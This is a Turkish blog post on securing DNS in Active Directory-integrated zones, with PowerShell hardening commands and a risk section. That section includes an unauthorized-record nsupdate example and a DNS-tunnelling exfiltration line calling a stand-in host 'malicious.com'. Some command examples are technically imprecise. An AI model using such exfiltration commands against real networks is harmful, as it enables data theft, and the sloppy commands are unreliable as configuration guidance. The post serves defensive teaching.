CyberFlow Logo CyberFlow BLOG
Soc L2 Infra Ad Cloud

DNS Güvenliği: Active Directory Entegre Zone Analizi ile Tehditleri Önleyin

✍️ Ahmet BİRKAN 📂 Soc L2 Infra Ad Cloud

DNS güvenliği ve Active Directory (AD) entegrasyonu hakkında bilinmesi gereken her şey. Saldırılara karşı koruma yöntemlerini keşfedin.

DNS Güvenliği: Active Directory Entegre Zone Analizi ile Tehditleri Önleyin

Bu blog yazısında, DNS güvenliği ve Active Directory (AD) entegre zone analizi üzerine kapsamlı bir inceleme yapıyoruz. DNS saldırılarına karşı etkili savunma yöntemlerini öğrenin.

Giriş ve Konumlandırma

DNS (Domain Name System), internetin temel taşlarından biri olarak, alan adlarını IP adreslerine dönüştürerek kullanıcıların web sitelerine erişimini sağlar. Özellikle Active Directory (AD) ile entegre edilen DNS, kurum içindeki hizmetlerin (LDAP, Kerberos gibi) düzgün bir şekilde çalışmasını sağlamak adına kritik bir role sahiptir. Ancak, bu yapıların güvenliğini sağlamak, siber tehditlerin artmasına paralel olarak giderek daha fazla önem kazanmıştır.

DNS ve Active Directory İlişkisi

Active Directory'nin düzgün işlemesi için güvenilir bir DNS yapısı gereklidir. Eğer DNS yapılandırması eksik veya hatalıysa, istemciler Domain Controller'larını (DC) bulmakta zorlanabilir ve bu durum ağ hizmetlerinin aksamasına yol açabilir. DNS, AD ortamlarında kritik hizmetlerin keşfedilmesini sağlarken, kötü niyetli aktörler için de saldırı yüzeyi oluşturur. Dolayısıyla, AD entegrasyonu ile birlikte kullanılan DNS’in güvenliği, her iki yapının da bütünlüğü açısından hayati öneme sahiptir.

Neden DNS Güvenliği Önemlidir?

Son yıllarda siber saldırıların önemli bir kısmı DNS protokolü üzerinden gerçekleştirilmektedir. Örneğin, saldırganlar kötü amaçlı yazılımların kontrol sunucularıyla iletişim kurmasını sağlamak için DNS'i kullanabilir. Bu tür saldırılar, genellikle veri sızdırma ve ağ içi keşif amacı gütmektedir. DNS güvenliği tehditlerine karşı proaktif önlemlerin alınması, ağ güvenliğinin artırılması için kritik bir adımdır.

Tehditler ve Savunma

DNS bazlı saldırılar, genellikle iki başlık altında ele alınabilir: DNS Tünelleme ve Zone Transfer riskleri. DNS Tünelleme, kötü niyetli yazılımların DNS sorguları aracılığıyla veri sızdırmak için kullandığı bir tekniktir. Bu tür saldırılara karşı, güvenlik duvarları ve IPS (Intrusion Prevention Systems) gibi araçların etkin kullanımı önerilmektedir.

Zone Transfer (AXFR) ise bir DNS sunucusunun tüm kayıtlarını başka bir DNS sunucusuna aktardığı bir işlemdir. Yetkisiz bir AXFR isteği, saldırganın ağ yapılandırmasını ve sunucu isimlerini ele geçirmesine olanak tanır. Bunun önüne geçmek için, zone transfer işlemleri sıkı bir şekilde kontrol edilmeli ve sadece yetkili sunuculara izin verilmelidir. Bu tür önlemler, AD entegrasyonunun güvenliğini artırmak ve potansiyel saldırılarla başa çıkabilmek adına kritik öneme sahiptir.

Okuyucuya Hazırlık

Bu yazıda, DNS güvenliği ve AD entegre zon analizinin önemine derinlemesine bir bakış sunulacaktır. Öncelikle AD Entegre Zonlar’ın avantajları ve potansiyel riskleri değerlendirilecektir. Ayrıca, söz konusu yöntemlerin uygulanmasına dair pratik bilgiler ve öneriler sıralanacaktır. DNS saldırılarına karşı savunma yöntemleri ile bu saldırıların nasıl önlenebileceği de ayrıntılı bir şekilde ele alınacaktır.

Bu bilgiler, siber güvenlik profesyonellerinin ve ağ yöneticilerinin DNS yapısını daha iyi anlamalarına ve güvenlik açıklarını minimize etmelerine yardımcı olacaktır. Uygulamalı örneklerle zenginleştirilecek içerik, katılımcılara hem teorik hem de pratik açıdan zengin bir perspektif sunmayı amaçlamaktadır.

Teknik Analiz ve Uygulama

DNS ve Active Directory İlişkisi

DNS (Domain Name System), Active Directory (AD) ortamlarında kritik bir rol oynar. AD, istemcilerin Domain Controller (DC) hizmetlerine (örneğin, LDAP, Kerberos) ulaşabilmesi için özel DNS kayıtları olan SRV kayıtları kullanır. Bu kayıtlar, sistem kaynaklarının bulunmasını ve iletişimini kolaylaştıran bir yapı sağlar. AD entegre DNS zonları, aynı zamanda çoklu-master replikasyon sayesinde DNS verilerinin AD veritabanı ile birlikte tüm DC'lere otomatik olarak kopyalanmasını sağlar.

# Örnek SRV kaydı oluşturma
Set-DnsServerResourceRecord -Name "_ldap._tcp.dc._msdcs.domain.local" -RecordType SRV -DnsServer "dnsserver.domain.local" -Priority 0 -Weight 100 -Port 389 -HostTarget "dc1.domain.local"

Bu komut, belirli bir DC’nin LDAP servisini bulmak için gerekli olan SRV kaydını DNS’e ekler.

AD Entegre Zonlar (AD-Integrated Zones)

Active Directory entegre zonlar, AD yapısına tam entegre olan DNS zonlarıdır. Bu zonlar, hem verimlilik hem de erişim açısından bir dizi avantaj sunar. Örneğin, ACL (Access Control List) koruması ilezon kayıtları, AD nesneleri gibi izinlerle korunabilir. Bu, sadece yetkili kullanıcıların DNS kayıtlarını değiştirmesine izin verir.

# AD-Integrated bir zona kayıt eklemek
Add-DnsServerResourceRecordA -Name "newhost" -IPv4Address "192.168.1.10" -ZoneName "domain.local"

Burada newhost, 192.168.1.10 IP adresine sahip bir A kaydını domain.local zonuna ekler.

Zone Transfer (AXFR) Riski

Zone transfer (AXFR) özelliği, belirli bir DNS zonasındaki tüm verilerin başka bir DNS sunucusuna aktarılmasına olanak tanır. Ancak, bu özellik sınırlandırılmazsa, yetkisiz bir AXFR isteği saldırganın tüm ağ yapısını ve sunucu isimlerini tek seferde ele geçirmesine neden olabilir. Zone transfer'ı sınırlamak için DNS sunucularında belirli IP adreslerine izin vermek gereklidir.

# Zone transfer'ı kısıtlama
Set-DnsServerZone -Name "domain.local" -ZoneTransferType None

Bu komut, domain.local zonu için zone transfer'ını devre dışı bırakır.

Dinamik Güncelleme Türleri

DNS'deki dinamik güncellemeler, kayıtların otomatik olarak güncellenmesine olanak tanır ve iki türde mevcuttur: güvenli ve güvensiz. Güvensiz dinamik güncellemeler, herhangi bir bilgisayarın (domain dışı da dahil) kayıt oluşturmasına izin verir ve bu durum ciddi güvenlik açıklarına yol açabilir.

# Güvenli dinamik güncellemeleri etkinleştirme
Set-DnsServerZone -Name "domain.local" -DynamicUpdate Secure

Bu komut, domain.local zonu için yalnızca domain üyesi bilgisayarların kendi DNS kayıtlarını güncelleyebilecekleri güvenli bir dinamik güncelleme ayarı sağlar.

Temel DNS Kayıt Türleri

AD ortamında sıkça kullanılan bazı temel DNS kayıt türleri şunlardır:

  • A Kaydı: IPv4 adresine yönlendirme.
  • AAAA Kaydı: IPv6 adresine yönlendirme.
  • PTR Kaydı: IP adresinden isim çözümlemesi (tersten çözümleme).
  • CNAME Kayıtları: Bir DNS ismini başka bir DNS ismine yönlendirme (takma ad).
# PTR kaydı oluşturma
Add-DnsServerResourceRecordPtr -Name "10.1.168.192.in-addr.arpa" -PtrDomainName "newhost.domain.local" -ZoneName "1.168.192.in-addr.arpa"

Yukarıdaki komut, 192.168.1.10 IP adresine ait bir PTR kaydı oluşturur.

DNS Tunneling (Tünelleme)

DNS protokolü, bazı saldırganlar tarafından veri sızdırmak için kullanılabilir. Saldırganlar, DNS sorgularının içindeki veriyi gizleyerek güvenlik duvarlarını aşabilir ve komut kontrol (C2) trafiği oluşturabilir. Bu tür tehditlere karşı network izleme ve DNS loglama önemlidir.

DNS Analitik Logları

Windows Server 2012 R2 ve sonrasında, her DNS sorgusunu ve yanıtını kaydedebilen bir analitik kayıt özelliği bulunmaktadır. Bu özellik, DNS faaliyetlerinin detaylı bir kaydını tutarak, olası saldırıların tespit edilmesine olanak tanır.

# DNS analitik loglamayı etkinleştirme
Set-DnsServerDiagnostic -LogDnsQueries $true -LogFilePath "C:\Logs\DNSQueries.log"

Bu komut, DNS sorgularını kaydetmeye başlar ve belirtilen dizine kaydeder.

DNS Saldırılarına Karşı Savunma

DNS tabanlı saldırıları önlemek için çeşitli savunma yöntemleri kullanılmaktadır. Bunlardan bazıları DNSSEC ile DNS verilerinin dijital imzalanması, response rate limiting ile yanıt hızının sınırlandırılması ve DNS sinkholing ile zararlı domainlere giden sorguların engellenmesidir.

Bu tedbirlerin yanı sıra, sürekli güncel tutulması gereken bir DNS güvenlik politikası geliştirilmesi önemlidir.

Scavenging (Temizlik) İşlemi

DNS veritabanında biriken eski (stale) kayıtların düzenli olarak temizlenmesi, hem performans hem de güvenlik açısından kritik bir adımdır. Bu süreç, zamanla geçmiş kayıtların temizlenmesini sağlayarak, veritabanı kirliliğini önler ve çeşitli cihazlar arasında IP çakışmalarını engeller. 

# DNS scavenging ayarlarını yapılandırma
Set-DnsServerZoneAging -Name "domain.local" -NoRefreshInterval 7 -RefreshInterval 30

Bu komut, domain.local bölgesindeki DNS kayıtları için yenileme ve temizleme zaman aralıklarını ayarlar.

DNS Forwarders (Yönlendiriciler)

Lokal DNS sunucusunun çözemediği sorguları, internet üzerindeki üst sunuculara (örneğin Google DNS: 8.8.8.8) ileten bu işlem, DNS yönlendirmesi (forwarding) olarak bilinir. Yönlendirme ayarlarının doğru yapılandırılması, DNS performansını artırarak internet üzerindeki DNS sorgularının daha hızlı yanıtlanmasını sağlar.

# DNS yönlendiricisi ekleme
Add-DnsServerForwarder -IPAddress "8.8.8.8"

Bu komut, DNS sunucusuna 8.8.8.8 IP adresli bir yönlendirici ekler.

Yukarıda belirtilen teknik yöntemler, DNS güvenliği ve AD entegre zona analizi gibi konularda derinlemesine bilgi sağlamakta ve pratik örneklerle desteklenmektedir. Bu süreçler, ağ güvenliğinin artırılması ve çeşitli saldırı türlerine karşı koruma sağlamada hayati bir rol oynamaktadır.

Risk, Yorumlama ve Savunma

Risk Analizi ve Yorumlama

DNS (Alan Adı Sistemi), ağ üzerindeki kaynakların yönlendirilmesinde kritik bir rol oynar. Active Directory (AD) ile entegre olduğunda, bu sistemin güvenlik zaafiyetleri, kurumsal bilgi sistemleri için ciddi tehditler oluşturabilir. Bu bölümde, DNS güvenliğini sağlamak için alınması gereken önlemler ile yapılan analizlerin önemine değinilecektir.

DNS ve AD İlişkisi

Active Directory ortamında DNS, istemcilerin Domain Controller (DC) servislerini bulmalarında önemli bir rol oynamaktadır. Örneğin, SRV kayıtları, LDAP veya Kerberos gibi servislerin lokasyonunu belirlemek için kullanılmakta ve yanlış yapılandırıldıklarında ciddi tehditler ortaya çıkabilmektedir. DNS’in zayıf noktaları, şunları içerebilir:

  • Yanlış yapılandırılmış dinamik güncellemeler
  • Saldırganların DNS üzerinden veri sızdırma girişimleri
  • İzinlerin uygun şekilde ayarlanmaması

Yanlış Yapılandırmalar ve Zafiyetler

Yanlış yapılandırmalar genellikle zafiyetlerin temel nedenidir. Örneğin, Non-secure dinamik güncellemeler, domain dışındaki bilgisayarların DNS kayıtlarına müdahale etmesine olanak tanır. Bu durum, saldırganların DNS kayıtlarını değiştirmesine veya sahte kayıtlar oluşturmasına yol açabilir. Olası sonuçlar arasında:

  • Sızan verinin ele geçirilmesi
  • Ağ topolojisinin ifşa edilmesi
  • Yetkisiz erişim sağlamaya yönelik saldırılar

Aşağıdaki örnek, bu tür bir zafiyetin nasıl kullanılabileceğini göstermektedir:

nsupdate -k keyfile
update add example.com 3600 A 192.0.2.1
send

Yukarıdaki komut, yetkisiz bir kullanıcının gerekli izinlere sahip olmadan DNS kaydı eklemesi için bir yöntemdir. Bu durumda, organizasyonun DNS yapılandırmasının güvenliğinden şüphe edilmesi gerektiği açıktır.

DNS Tünelleme ve Veri Sızdırmaları

Saldırganlar, DNS protokolünü kullanarak veri sızdırabilirler. DNS Tünelleme olarak bilinen bu teknik, zararlı verilerin DNS sorguları içerisinde gizlenmesine olanak tanır. Bunun sonucunda, güvenlik duvarları aşılabilir ve zararlı içerikler sisteme sokulabilir. Örnek bir DNS tünelleme sorgusu aşağıdaki gibi olabilir:

dig @malicious.com txt "exfiltrate sensitive data"

Bu çalışma yöntemi, organizasyonların veri exfiltration yöntemi olarak kullanılabilecek tehlikeli bir teknik olduğunu ortaya koymaktadır.

Hardening Önerileri

DNS güvenliğini artırmak için aşağıdaki önlemlerin alınması önerilmektedir:

  1. Güvenli Dinamik Güncellemeler: Sadece domain üyesi bilgisayarların DNS kayıtlarını güncelleyebilmesi için güvenli dinamik güncellemelerin aktif hale getirilmesi.

  2. ACL Koruması: DNS zonlarının ve kayıtlarının güvenlik izinleri ile korunması. Böylece sadece yetkili kullanıcıların erişimi sağlanır.

  3. DNSSEC Kullanımı: DNS verilerinin dijital imza ile korunması, verilerin doğruluğunu ve bütünlüğünü artırır.

  4. Response Rate Limiting: DNS üzerine yapılacak potansiyel saldırılara karşı önlem olarak yanıt hızının sınırlandırılması önerilir.

  5. DNS Sinkholing: Zararlı domainlere giden DNS sorgularının güvenli bir adrese yönlendirilmesi, organizasyonun güvenliğini artırır.

Sonuç

DNS güvenliği, siber saldırılara karşı en kritik savunma hattını oluşturmaktadır. Active Directory ile entegre yapıların doğru biçimde yapılandırılması, saldırıların önüne geçmek için elzemdir. Yanlış yapılandırmalar, veri sızıntılarına ve ağzafiyetlerine yol açmaktadır. Yukarıda belirtilen hardening önerileri, siber güvenlik risklerini minimize etmek için uygulamaya değer stratejilerdir. Kuruluşların, DNS’in güvenliğini artırarak daha sağlam bir siber savunma hendeği oluşturması gerekmektedir.